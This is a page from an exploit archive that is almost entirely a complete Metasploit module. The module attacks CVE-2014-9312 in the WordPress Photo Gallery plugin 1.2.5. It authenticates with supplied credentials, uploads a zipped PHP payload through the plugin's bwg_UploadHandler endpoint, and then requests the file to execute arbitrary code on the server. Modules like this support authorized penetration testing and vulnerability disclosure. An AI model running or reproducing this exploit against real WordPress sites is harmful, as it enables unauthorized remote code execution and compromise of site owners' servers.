exploit the possibilities

WordPress Photo Gallery 1.2.5 Unrestricted File Upload

WordPress Photo Gallery 1.2.5 Unrestricted File Upload
Posted Feb 12, 2015
Authored by Kacper Szurek | Site metasploit.com

Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post() method in UploadHandler.php

tags | exploit, remote, arbitrary, php
advisories | CVE-2014-9312
MD5 | d5407ef3b9af0583a41aa80c37d5a6ae

WordPress Photo Gallery 1.2.5 Unrestricted File Upload

Change Mirror Download
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'
require 'json'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress

def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Photo Gallery 1.2.5 Unrestricted File Upload',
'Description' => %q{Photo Gallery Plugin for WordPress contains a flaw that allows a
remote attacker to execute arbitrary PHP code. This flaw exists
because the photo-gallery\photo-gallery.php script allows access
to filemanager\UploadHandler.php. The post() method in UploadHandler.php
does not properly verify or sanitize user-uploaded files.},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '117676'],
['WPVDB', '7769'],
['CVE', '2014-9312'],
['URL', 'http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html']
],
'DisclosureDate' => 'Nov 11 2014',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['photo-gallery < 1.2.6', {}]],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end

def check
check_plugin_version_from_readme('photo-gallery', '1.2.6')
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def generate_mime_message(payload, name)
data = Rex::MIME::Message.new
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file("#{name}.php", payload.encoded)
data.add_part(zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"files\"; filename=\"#{name}.zip\"")
data
end

def exploit
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
print_good("#{peer} - Authenticated with WordPress")

print_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha(10)
data = generate_mime_message(payload, payload_name)

upload_dir = "#{Rex::Text.rand_text_alpha(5)}/"
print_status("#{peer} - Uploading payload to #{upload_dir}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_get' => { 'action' => 'bwg_UploadHandler', 'dir' => upload_dir },
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie
)

fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
print_good("#{peer} - Uploaded the payload")

print_status("#{peer} - Parsing server response...")
begin
json = JSON.parse(res.body)
if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil?
fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
else
uploaded_name = json['files'][0]['name'][0..-5]
php_file_name = "#{uploaded_name}.php"
payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name)
print_good("#{peer} - Parsed response")

register_files_for_cleanup(php_file_name)
register_files_for_cleanup("../#{uploaded_name}.zip")
print_status("#{peer} - Executing the payload at #{payload_url}")
send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
print_good("#{peer} - Executed payload")
end
rescue
fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close